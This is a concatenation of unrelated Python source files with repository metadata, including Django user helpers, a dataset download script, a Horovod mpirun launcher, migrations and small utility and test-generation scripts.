return 'user_%s_%s' % (str(next_id), str(random_salt))
def create_user_from_openid(request, openid):
"""
Creates a new User object associated with the given
openid.
"""
from django_community.config import OPENID_FIELD_MAPPING
from django_utils.request_helpers import get_ip
username = generate_random_user_name()
profile_attributes = {}
for attribute in OPENID_FIELD_MAPPING.keys():
mapped_attribute = OPENID_FIELD_MAPPING[attribute]
if openid.sreg and openid.sreg.get(attribute, ''):
profile_attributes[mapped_attribute] = openid.sreg.get(attribute, '')
new_user = User(username = username)
new_user.save()
new_openid = UserOpenID(openid = openid.openid, user = new_user)
new_openid.save()
new_user_profile = UserProfile.objects.get_user_profile(new_user)
for filled_attribute in profile_attributes.keys():
setattr(new_user, filled_attribute, profile_attributes[filled_attribute])
new_user_profile.save()
return new_user
def get_anon_user(request):
"""
Returns an anonymous user corresponding to this IP address if one exists.
Else create an anonymous user and return it.
"""
try:
anon_user = User.objects.get(username = generate_anon_user_name(request))
except ObjectDoesNotExist:
anon_user = create_anon_user(request)
return anon_user
def create_anon_user(request):
"""
Creates a new anonymous user based on the ip provided by the request
object.
"""
anon_user_name = generate_anon_user_name(request)
anon_user = User(username = anon_user_name)
anon_user.save()
user_profile = UserProfile(user = anon_user, display_name = 'anonymous')
user_profile.save()
return anon_user
def generate_anon_user_name(request):
"""
Generate an anonymous user name based on an IP address.
"""
from django_utils.request_helpers import get_ip
ip = get_ip(request)
return "anon_user_%s" % (str(ip))
def is_anon_user(user):
"""
Determine whether a user is anonymous.
"""
return user.username[0:10] == 'anon_user_'
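# Illustrative note (not part of the module): for a request coming from the
# hypothetical address 10.0.0.5, the helpers above compose as
#   generate_anon_user_name(request)  -> 'anon_user_10.0.0.5'
#   is_anon_user(user_with_that_name) -> True, via the 'anon_user_' prefix check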
def is_random(name):
"""
Determine if a user has a randomly generated display name.
"""
if len(name.split('_')) > 1 and name.startswith('user_'):
return True
else:
return False
def process_ax_data(user, ax_data):
"""
Process OpenID AX data.
"""
import django_openidconsumer.config
emails = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('email').get('type_uri', ''), '')
display_names = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('alias').get('type_uri', ''), '')
if emails and not user.email.strip():
user.email = emails[0]
user.save()
if not user.profile.display_name.strip() or is_random(user.profile.display_name):
if display_names:
user.profile.display_name = display_names[0]
elif emails:
user.profile.display_name = emails[0].split('@')[0]
user.profile.save() | 32.262626 | 109 | 0.681277 | 825 | 6,388 | 5.100606 | 0.207273 | 0.034221 | 0.02424 | 0.019962 | 0.201046 | 0.144487 | 0.077947 | 0.04135 | 0.022338 | 0 | 0 | 0.003627 | 0.223075 | 6,388 | 198 | 110 | 32.262626 | 0.844247 | 0.170319 | 0 | 0.184874 | 0 | 0 | 0.026904 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.05042 | 0.159664 | 0 | 0.378151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20f3b3cdb095ea301a3efa6ea5c8c922e9be8db | 640 | py | Python | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 44 | 2016-09-07T11:04:10.000Z | 2022-03-14T07:38:17.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 1 | 2016-09-06T23:33:54.000Z | 2016-09-06T23:33:54.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 13 | 2016-09-17T15:31:06.000Z | 2021-05-22T07:28:46.000Z | from subprocess import call
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
import settings
data_zip_path = os.path.join(settings.lfw10_root, "LFW10.zip")
data_url = "http://cvit.iiit.ac.in/images/Projects/relativeParts/LFW10.zip"
# Downloading the data zip and extracting it
call(["wget",
"--continue", # do not download things again
"--tries=0", # try many times to finish the download
"--output-document=%s" % data_zip_path, # save it to the appropriate place
data_url])
call(["unzip -d %s %s" % (settings.lfw10_root, data_zip_path)], shell=True)
| 33.684211 | 85 | 0.714063 | 99 | 640 | 4.474747 | 0.565657 | 0.054176 | 0.074492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016484 | 0.146875 | 640 | 18 | 86 | 35.555556 | 0.794872 | 0.221875 | 0 | 0 | 0 | 0 | 0.259635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
f210443ae14873f6d0154e4872180eb345a39221 | 9,874 | py | Python | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | """
Utility functions to retrieve information about available services and set up security for the Hops platform.
These utils facilitate development by hiding complexity for programs interacting with Hops services.
"""
import pydoop.hdfs
import subprocess
import os
import stat
import sys
import threading
import time
import socket
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
from hops import util
import coordination_server
run_id = 0
def launch(spark_session, notebook):
""" Run notebook pointed to in HopsFS as a python file in mpirun
Args:
:spark_session: SparkSession object
:notebook: The path in HopsFS to the notebook
"""
global run_id
print('\nStarting TensorFlow job, follow your progress on TensorBoard in Jupyter UI! \n')
sys.stdout.flush()
sc = spark_session.sparkContext
app_id = str(sc.applicationId)
conf_num = int(sc._conf.get("spark.executor.instances"))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(conf_num), conf_num)
server = coordination_server.Server(conf_num)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(prepare_func(app_id, run_id, notebook, server_addr))
print('Finished TensorFlow job \n')
print('Make sure to check /Logs/TensorFlow/' + app_id + '/runId.' + str(run_id) + ' for logfile and TensorBoard logdir')
def get_logdir(app_id):
global run_id
return hopshdfs.project_path() + '/Logs/TensorFlow/' + app_id + '/horovod/run.' + str(run_id)
def prepare_func(app_id, run_id, nb_path, server_addr):
def _wrapper_fun(iter):
for i in iter:
executor_num = i
client = coordination_server.Client(server_addr)
node_meta = {'host': get_ip_address(),
'executor_cwd': os.getcwd(),
'cuda_visible_devices_ordinals': devices.get_minor_gpu_device_numbers()}
client.register(node_meta)
t_gpus = threading.Thread(target=devices.print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t_gpus.start()
# Only spark executor with index 0 should create necessary HDFS directories and start mpirun
# Other executors simply block until index 0 reports mpirun is finished
clusterspec = client.await_reservations()
#pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
#hopshdfs.init_logger()
#hopshdfs.log('Starting Spark executor with arguments')
gpu_str = '\n\nChecking for GPUs in the environment\n' + devices.get_gpu_info()
#hopshdfs.log(gpu_str)
print(gpu_str)
mpi_logfile_path = os.getcwd() + '/mpirun.log'
if os.path.exists(mpi_logfile_path):
os.remove(mpi_logfile_path)
mpi_logfile = open(mpi_logfile_path, 'w')
py_runnable = localize_scripts(nb_path, clusterspec)
# non-chief executor should not do mpirun
if not executor_num == 0:
client.await_mpirun_finished()
else:
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs.create_directories(app_id, run_id, param_string='Horovod')
tb_hdfs_path, tb_pid = tensorboard.register(hdfs_exec_logdir, hdfs_appid_logdir, 0)
mpi_cmd = 'HOROVOD_TIMELINE=' + tensorboard.logdir() + '/timeline.json' + \
' TENSORBOARD_LOGDIR=' + tensorboard.logdir() + \
' mpirun -np ' + str(get_num_ps(clusterspec)) + ' --hostfile ' + get_hosts_file(clusterspec) + \
' -bind-to none -map-by slot ' + \
' -x LD_LIBRARY_PATH ' + \
' -x HOROVOD_TIMELINE ' + \
' -x TENSORBOARD_LOGDIR ' + \
' -x NCCL_DEBUG=INFO ' + \
' -mca pml ob1 -mca btl ^openib ' + \
os.environ['PYSPARK_PYTHON'] + ' ' + py_runnable
mpi = subprocess.Popen(mpi_cmd,
shell=True,
stdout=mpi_logfile,
stderr=mpi_logfile,
preexec_fn=util.on_executor_exit('SIGTERM'))
t_log = threading.Thread(target=print_log)
t_log.start()
mpi.wait()
client.register_mpirun_finished()
if devices.get_num_gpus() > 0:
t_gpus.do_run = False
t_gpus.join()
return_code = mpi.returncode
if return_code != 0:
cleanup(tb_hdfs_path)
t_log.do_run = False
t_log.join()
raise Exception('mpirun FAILED, look in the logs for the error')
cleanup(tb_hdfs_path)
t_log.do_run = False
t_log.join()
return _wrapper_fun
def print_log():
mpi_logfile_path = os.getcwd() + '/mpirun.log'
mpi_logfile = open(mpi_logfile_path, 'r')
t = threading.currentThread()
while getattr(t, "do_run", True):
where = mpi_logfile.tell()
line = mpi_logfile.readline()
if not line:
time.sleep(1)
mpi_logfile.seek(where)
else:
print(line)
# Get the last outputs
line = mpi_logfile.readline()
while line:
where = mpi_logfile.tell()
print(line)
line = mpi_logfile.readline()
mpi_logfile.seek(where)
def cleanup(tb_hdfs_path):
hopshdfs.log('Performing cleanup')
handle = hopshdfs.get()
if not tb_hdfs_path == None and not tb_hdfs_path == '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs.kill_logger()
def get_ip_address():
"""Simple utility to get host IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hosts_string(clusterspec):
hosts_string = ''
for host in clusterspec:
hosts_string = hosts_string + ' ' + host['host'] + ':' + str(len(host['cuda_visible_devices_ordinals']))
return hosts_string
def get_num_ps(clusterspec):
num = 0
for host in clusterspec:
num += len(host['cuda_visible_devices_ordinals'])
return num
def get_hosts_file(clusterspec):
hf = ''
host_file = os.getcwd() + '/host_file'
for host in clusterspec:
hf = hf + '\n' + host['host'] + ' ' + 'slots=' + str(len(host['cuda_visible_devices_ordinals']))
with open(host_file, 'w') as hostfile: hostfile.write(hf)
return host_file
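# Illustrative example (not part of the module): for a clusterspec with two hosts
# (hypothetical addresses) exposing 2 and 1 visible GPUs respectively, the file
# written above contains
#   10.0.0.1 slots=2
#   10.0.0.2 slots=1
# which is the hostfile format consumed by the `mpirun --hostfile` invocation in
# prepare_func.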
def find_host_in_clusterspec(clusterspec, host):
for h in clusterspec:
if h['name'] == host:
return h
# The code generated by this function is executed via exec() and changes the working dir and CUDA_VISIBLE_DEVICES for the process running mpirun
def generate_environment_script(clusterspec):
import_script = 'import os \n' \
'from hops import util'
export_script = ''
for host in clusterspec:
export_script += 'def export_workdir():\n' \
' if util.get_ip_address() == \"' + find_host_in_clusterspec(clusterspec, host['host'])['host'] + '\":\n' \
' os.chdir(\"' + host['executor_cwd'] + '\")\n' \
' os.environ["CUDA_DEVICE_ORDER"]=\"PCI_BUS_ID\" \n' \
' os.environ["CUDA_VISIBLE_DEVICES"]=\"' + ",".join(str(x) for x in host['cuda_visible_devices_ordinals']) + '\"\n'
return import_script + '\n' + export_script
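# Illustrative example (not part of the module): for a single clusterspec entry
# {'host': '10.0.0.1', 'executor_cwd': '/srv/exec0',
#  'cuda_visible_devices_ordinals': [0, 1]} (hypothetical values), the string
# returned above is roughly
#   import os
#   from hops import util
#   def export_workdir():
#       if util.get_ip_address() == "10.0.0.1":
#           os.chdir("/srv/exec0")
#           os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
#           os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
# which the wrapper written by localize_scripts below reads and exec()s.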
def localize_scripts(nb_path, clusterspec):
# 1. Download the notebook as a string
fs_handle = hopshdfs.get_fs()
fd = fs_handle.open_file(nb_path, flags='r')
note = fd.read()
fd.close()
path, filename = os.path.split(nb_path)
f_nb = open(filename,"w+")
f_nb.write(note)
f_nb.flush()
f_nb.close()
# 2. Convert notebook to py file
jupyter_runnable = os.path.abspath(os.path.join(os.environ['PYSPARK_PYTHON'], os.pardir)) + '/jupyter'
conversion_cmd = jupyter_runnable + ' nbconvert --to python ' + filename
conversion = subprocess.Popen(conversion_cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
conversion.wait()
stdout, stderr = conversion.communicate()
print(stdout)
print(stderr)
# 3. Prepend script to export environment variables and Make py file runnable
py_runnable = os.getcwd() + '/' + filename.split('.')[0] + '.py'
notebook = 'with open("generate_env.py", "r") as myfile:\n' \
' data=myfile.read()\n' \
' exec(data)\n'
with open(py_runnable, 'r') as original: data = original.read()
with open(py_runnable, 'w') as modified: modified.write(notebook + data)
st = os.stat(py_runnable)
os.chmod(py_runnable, st.st_mode | stat.S_IEXEC)
# 4. Localize generate_env.py script
environment_script = generate_environment_script(clusterspec)
generate_env_path = os.getcwd() + '/generate_env.py'
f_env = open(generate_env_path, "w+")
f_env.write(environment_script)
f_env.flush()
f_env.close()
# 5. Make generate_env.py runnable
st = os.stat(generate_env_path)
os.chmod(py_runnable, st.st_mode | stat.S_IEXEC)
return py_runnable | 36.435424 | 295 | 0.594896 | 1,190 | 9,874 | 4.714286 | 0.267227 | 0.030303 | 0.01426 | 0.023173 | 0.12246 | 0.105704 | 0.05918 | 0.035294 | 0.026381 | 0.026381 | 0 | 0.003633 | 0.303119 | 9,874 | 271 | 296 | 36.435424 | 0.811655 | 0.086591 | 0 | 0.169399 | 0 | 0 | 0.143424 | 0.034571 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.087432 | null | null | 0.060109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f218482525c6f07411100d66a18c105ea0a2d6c8 | 926 | py | Python | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | TEST_CONFIG_OVERRIDE = {
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
"gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
# 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {
"GA_TEST_PROPERTY_ID": "276206997",
"GA_TEST_ACCOUNT_ID": "199820965",
"GA_TEST_USER_LINK_ID": "103401743041912607932",
"GA_TEST_PROPERTY_USER_LINK_ID": "105231969274497648555",
"GA_TEST_ANDROID_APP_DATA_STREAM_ID": "2828100949",
"GA_TEST_IOS_APP_DATA_STREAM_ID": "2828089289",
"GA_TEST_WEB_DATA_STREAM_ID": "2828068992",
},
}
| 46.3 | 70 | 0.712743 | 127 | 926 | 4.826772 | 0.503937 | 0.068516 | 0.092985 | 0.127243 | 0.14845 | 0.14845 | 0.14845 | 0.14845 | 0 | 0 | 0 | 0.121786 | 0.201944 | 926 | 19 | 71 | 48.736842 | 0.707713 | 0.429806 | 0 | 0 | 0 | 0 | 0.609615 | 0.365385 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f21a51bd13a2f891e2303ec8e105009193f93ecb | 422 | py | Python | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/saleor | 0d75807d08ac49afcc904733724ac870e8359c10 | [
"CC-BY-4.0"
] | null | null | null | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/saleor | 0d75807d08ac49afcc904733724ac870e8359c10 | [
"CC-BY-4.0"
] | 1 | 2022-02-15T03:31:12.000Z | 2022-02-15T03:31:12.000Z | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/ushop | abf637eb6f7224e2d65d62d72a0c15139c64bb39 | [
"CC-BY-4.0"
] | null | null | null | # Generated by Django 3.1.1 on 2021-09-21 04:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crawler', '0012_auto_20210921_0451'),
]
operations = [
migrations.AlterField(
model_name='crawlerline',
name='ustatus',
field=models.PositiveIntegerField(blank=True, default=1, null=True),
),
]
| 22.210526 | 80 | 0.618483 | 45 | 422 | 5.711111 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10356 | 0.267773 | 422 | 18 | 81 | 23.444444 | 0.728155 | 0.106635 | 0 | 0 | 1 | 0 | 0.128 | 0.061333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1eec0296b555ebcc98cbc7b360b616946e53db82 | 941 | py | Python | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 14 | 2015-10-03T07:34:28.000Z | 2021-09-20T07:10:29.000Z | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 23 | 2019-10-25T08:47:23.000Z | 2022-01-30T02:00:45.000Z | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 7 | 2016-10-04T08:10:36.000Z | 2021-09-20T07:10:33.000Z | from django.shortcuts import get_object_or_404
from rest_framework import permissions
from manabi.apps.flashcards.models import Deck
WRITE_ACTIONS = ['create', 'update', 'partial_update', 'delete']
class DeckSynchronizationPermission(permissions.BasePermission):
message = "You don't have permission to add this deck to your library."
def has_permission(self, request, view):
if view.action in WRITE_ACTIONS:
upstream_deck = get_object_or_404(
Deck, pk=request.data['synchronized_with'])
return upstream_deck.shared
return True
class IsOwnerPermission(permissions.BasePermission):
message = "You don't own this."
def has_object_permission(self, request, view, obj):
if view.action in WRITE_ACTIONS:
return (
request.user.is_authenticated and
obj.owner.pk == request.user.pk
)
return True
| 30.354839 | 75 | 0.679065 | 112 | 941 | 5.544643 | 0.535714 | 0.057971 | 0.035427 | 0.045089 | 0.20934 | 0.20934 | 0 | 0 | 0 | 0 | 0 | 0.008439 | 0.244421 | 941 | 30 | 76 | 31.366667 | 0.864979 | 0 | 0 | 0.190476 | 0 | 0 | 0.134963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1eef8337b3089adedce496c555766805e7a14c76 | 365 | py | Python | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | 4 | 2020-09-30T17:18:13.000Z | 2021-06-11T21:02:10.000Z | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | null | null | null | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | 1 | 2021-04-02T14:51:00.000Z | 2021-04-02T14:51:00.000Z | """
Converts a list of 10 digits
into a string in the standard phone-number format.
Example:
(123) 456-7890
"""
def create_phone_number(n: list) -> str:
"""
>>> create_phone_number([1,2,3,4,5,6,7,8,9,0])
'(123) 456-7890'
"""
return "({}{}{}) {}{}{}-{}{}{}{}".format(*n)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 15.869565 | 50 | 0.556164 | 50 | 365 | 3.82 | 0.78 | 0.172775 | 0.17801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109541 | 0.224658 | 365 | 22 | 51 | 16.590909 | 0.565371 | 0.449315 | 0 | 0 | 0 | 0 | 0.189349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1ef2ba31fbb403bcb4ce6125ac2b8a6fd53306d0 | 527 | py | Python | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-06-13T06:39:44.000Z | 2020-06-13T06:39:44.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-07-16T23:07:28.000Z | 2020-07-16T23:07:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import imageio
import numpy as np
from tar.miscellaneous import convert_flow_to_color
prev = imageio.imread("ressources/1_1.png")
prev = cv2.cvtColor(prev, cv2.COLOR_RGB2GRAY)
curr = imageio.imread("ressources/1_2.png")
curr = cv2.cvtColor(curr, cv2.COLOR_RGB2GRAY)
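# Dense Farneback optical flow between the two grayscale frames; the positional
# arguments correspond to pyr_scale=0.9, levels=15, winsize=20, iterations=100,
# poly_n=10 and poly_sigma=1.5 in OpenCV's calcOpticalFlowFarneback signature.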
flow = cv2.calcOpticalFlowFarneback(prev, curr, None, 0.9, 15, 20, 100, 10, 1.5, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)
rgb = convert_flow_to_color(flow)
imageio.imsave("/Users/sele/Desktop/test.png", rgb)
| 29.277778 | 112 | 0.759013 | 83 | 527 | 4.674699 | 0.566265 | 0.056701 | 0.06701 | 0.092784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059197 | 0.102467 | 527 | 17 | 113 | 31 | 0.761099 | 0.081594 | 0 | 0 | 0 | 0 | 0.13278 | 0.058091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1ef4bd40a0edef859ca09644504d0ac02de309a6 | 746 | py | Python | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | 2 | 2018-03-15T16:53:11.000Z | 2020-01-17T15:56:33.000Z | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | null | null | null | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-07 22:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0008_auto_20171207_2256'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='category',
),
migrations.AddField(
model_name='post',
name='category',
field=models.CharField(choices=[('frontend', 'Frontend'), ('backend', 'Backend'), ('interview', 'Interview'), ('devop', 'Devop')], default='backend', max_length=15),
),
migrations.DeleteModel(
name='Category',
),
]
| 26.642857 | 177 | 0.577748 | 71 | 746 | 5.915493 | 0.676056 | 0.085714 | 0.061905 | 0.080952 | 0.119048 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062731 | 0.273458 | 746 | 27 | 178 | 27.62963 | 0.712177 | 0.088472 | 0 | 0.35 | 1 | 0 | 0.183161 | 0.033973 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ef930c42df2781ea2ef6709774093b794cfc83e | 3,081 | py | Python | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2.7
from common import *
from random import randint, choice
registers = {\
"a" : int("0000", 2),
"f" : int("0001", 2),
"b" : int("0010", 2),
"c" : int("0011", 2),
"d" : int("0100", 2),
"e" : int("0101", 2),
"h" : int("0110", 2),
"l" : int("0111", 2),
"af" : int("1000", 2),
"bc" : int("1001", 2),
"de" : int("1010", 2),
"hl" : int("1011", 2),
"sp" : int("1100", 2),
"pc" : int("1101", 2),
}
def output_line(fp, reg_write, reg_read, we,
write_data, read_data, reg_w_name, reg_r_name):
fp.write("%s %s %s %s %s #%s %s\n" %
(to_bin(reg_write, 4),
to_bin(reg_read, 4),
"1" if we else "0",
to_bin(write_data, 16),
to_bin(read_data, 16),
reg_w_name,
reg_r_name))
class Registers(object):
def __init__(self):
self.regs = [0] * 8
self.sp = 0
self.pc = 0
def write(self, reg, value):
if reg == "af":
self.regs[registers["a"]] = (value >> 8) & 0xff
self.regs[registers["f"]] = (value >> 0) & 0xff
elif reg == "bc":
self.regs[registers["b"]] = (value >> 8) & 0xff
self.regs[registers["c"]] = (value >> 0) & 0xff
elif reg == "de":
self.regs[registers["d"]] = (value >> 8) & 0xff
self.regs[registers["e"]] = (value >> 0) & 0xff
elif reg == "hl":
self.regs[registers["h"]] = (value >> 8) & 0xff
self.regs[registers["l"]] = (value >> 0) & 0xff
elif reg == "sp":
self.sp = value
elif reg == "pc":
self.pc = value
else:
self.regs[registers[reg]] = (value) & 0xff
def read(self, reg):
if reg == "af":
return self.regs[registers["a"]] << 8 | self.regs[registers["f"]];
elif reg == "bc":
return self.regs[registers["b"]] << 8 | self.regs[registers["c"]];
elif reg == "de":
return self.regs[registers["d"]] << 8 | self.regs[registers["e"]];
elif reg == "hl":
return self.regs[registers["h"]] << 8 | self.regs[registers["l"]];
elif reg == "sp":
return self.sp
elif reg == "pc":
return self.pc
else:
return self.regs[registers[reg]];
def random_op(self):
we = randint(0, 1)
reg_write = choice(registers.keys())
reg_read = choice(registers.keys())
write_data = randint(0, 0xffff)
read_data = self.read(reg_read)
if we:
self.write(reg_write, write_data)
return (registers[reg_write], registers[reg_read],
we, write_data, read_data, reg_write, reg_read)
def main():
fp = open("registers.txt", "w")
reg = Registers()
m = 1000000
for i in xrange(m):
if i % 10000 == 0:
f = 100 * float(i) / float(m)
print("%s" % f)
output_line(fp, *reg.random_op())
if __name__ == "__main__":
main()
